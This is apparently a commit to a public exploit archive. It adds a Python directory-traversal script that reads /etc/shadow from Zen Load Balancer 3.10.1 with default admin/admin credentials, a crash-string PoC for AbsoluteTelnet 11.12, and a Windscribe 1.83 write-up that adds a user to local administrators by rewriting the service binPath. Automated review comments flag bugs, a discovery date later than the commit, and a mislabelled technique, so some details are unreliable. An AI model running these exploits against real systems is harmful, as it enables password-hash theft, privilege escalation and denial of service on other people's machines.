DB: 2020-04-11
3 changes to exploits/shellcodes

AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
parent 0f8df71e72
commit 4ee0ce31e7
4 changed files with 108 additions and 0 deletions
31
exploits/cgi/webapps/48308.py
Executable file
@ -0,0 +1,31 @@
# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Date: 2020-04-10
# Exploit Author: Basim Alabdullah
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Debian8u2
#
# Technical Details:
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
#
# Impact:
# --------
# Successful exploitation could allow an attacker to obtain sensitive
# information.

import requests
import sys

if len(sys.argv) <2:
print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
sys.exit(-1)
else:
files=sys.argv[2]
url=sys.argv[1]
with requests.session() as s:
urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
response = s.get(urlz, auth=('admin', 'admin'), verify=False)
txt=response.text
print(response.text)
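Review bot: the argument check `if len(sys.argv) <2:` is off by one; the `else` branch reads `sys.argv[2]`, so running the script with only a URL raises an IndexError instead of printing the usage line. It should be `< 3`. Separately, the request hard-codes `auth=('admin', 'admin')` while the header never says that `index.cgi` is only reachable after authentication; either state that the traversal is post-auth and take the credentials as arguments, or say explicitly that default credentials are assumed. Minor: `txt=response.text` is unused, and `verify=False` will print an InsecureRequestWarning on every run unless it is silenced with `urllib3.disable_warnings()`.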
22
exploits/windows/dos/48305.py
Executable file
@ -0,0 +1,22 @@
# Exploit Title: AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-05-02
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet11.12.exe
# Tested Version: 11.12
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to produce the crash:
# 1.- Run python code: AbsoluteTelnet 11.12_username_ssh1.py
# 2.- Open absolutetelnet_username_SSH1.txt and copy content to clipboard
# 3.- Open AbsoluteTelnet
# 4.- Select "new connection file", "Connection", "SSH1", "Use last username"
# 5.- In "username" field paste Clipboard
# 6.- Select "OK"
# 7.- Crashed

buffer = "\x41" * 1000
f = open ("absolutetelnet_username_SSH1.txt", "w")
f.write(buffer)
f.close()
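Review bot: the header line `# Discovery Date: 2020-05-02` cannot be right; it is three weeks after this commit (DB: 2020-04-11) and disagrees with the 2020-04-10 date this same commit records for 48305 in the CSV. Correct it so the two agree. Step 1 also tells the reader to run `AbsoluteTelnet 11.12_username_ssh1.py`, which is not the name the script is committed under (48305.py); the steps should reference the committed file. Finally, the PoC only writes 1000 `A` bytes for manual pasting and step 7 says "Crashed" with nothing else; adding what was observed (exception type, faulting module, whether the exception was handled) would let readers tell an unhandled-exception DoS from a controllable overflow.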
52
exploits/windows/local/48306.txt
Normal file
@ -0,0 +1,52 @@
# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Date: 2020-04-10
# Exploit Author: MgThuraMoeMyint
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Windows 10, version 1909

In windscribe v1.83 , there is a service via windscribe that every
authenticated user can modify.

C:\Users\mgthura>sc qc WindscribeService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WindscribeService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Windscribe\WindscribeService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WindscribeService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

That shows that running as Local System this means that the
BINARY_PATH_NAME parameter can be modified to execute any command on
the system.
I'll change binary_path_name with a command that add a user to
administrators group , so it will be

C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup
administrators pentest /add"
[SC] ChangeServiceConfig SUCCESS

C:\Users\mgthura>sc stop WindscribeService

SERVICE_NAME: WindscribeService
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x4
WAIT_HINT : 0x0

C:\Users\mgthura>sc start WindscribeService
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

Restarting service will cause the service to fail as the binary path
would not point into the actual executable of the service.
However the command will be executed successfully and the user will be
added to the local administrators group.
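Review bot: the title "Unquoted Service Path" does not describe the technique shown. An unquoted-path bug is exploited by planting a binary such as `C:\Program.exe` or `C:\Program Files (x86)\Windscribe.exe` for the service to pick up at start; what the write-up does is `sc config WindscribeService binPath= "net localgroup administrators pentest /add"` followed by stop/start, which only works if the service DACL grants SERVICE_CHANGE_CONFIG to an unprivileged user. That is an insecure service permissions (weak service ACL) issue and the title should say so. The claim that "every authenticated user can modify" the service is also not evidenced: the only output included is `sc qc`, which prints configuration, not permissions; add `sc sdshow WindscribeService` or `accesschk.exe -ucqv WindscribeService` run from the low-privileged account. Two smaller points: "That shows that running as Local System this means that the BINARY_PATH_NAME parameter can be modified" conflates two things (the LocalSystem account is why the payload runs as SYSTEM; whether binPath is changeable depends on the ACL, not on the account), and `net localgroup administrators pentest /add` presupposes a user named `pentest` already exists.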
@ -6702,6 +6702,7 @@ id,file,description,date,author,type,platform,port
48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
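Review bot: the new row dates 48305 at 2020-04-10, but the committed 48305.py header in this same change says `Discovery Date: 2020-05-02`, a date after the commit itself; one of the two is wrong and they should agree before the row is indexed.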
@ -11024,6 +11025,7 @@ id,file,description,date,author,type,platform,port
48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
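Review bot: the description for 48306 carries the "Unquoted Service Path" title, but the committed write-up exploits a rewritable `binPath=` (weak service permissions) rather than an unquoted path; rename the row to match the technique so it is not indexed under the wrong class.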
@ -42547,3 +42549,4 @@ id,file,description,date,author,type,platform,port
48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,
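Review bot: the port column for 48308 is left empty although the PoC's own usage line targets `https://192.168.1.1:444`; if 444 is the management port the script is meant to hit, record it in the row, as the remote entries elsewhere in this file do (e.g. `...,remote,windows,80`).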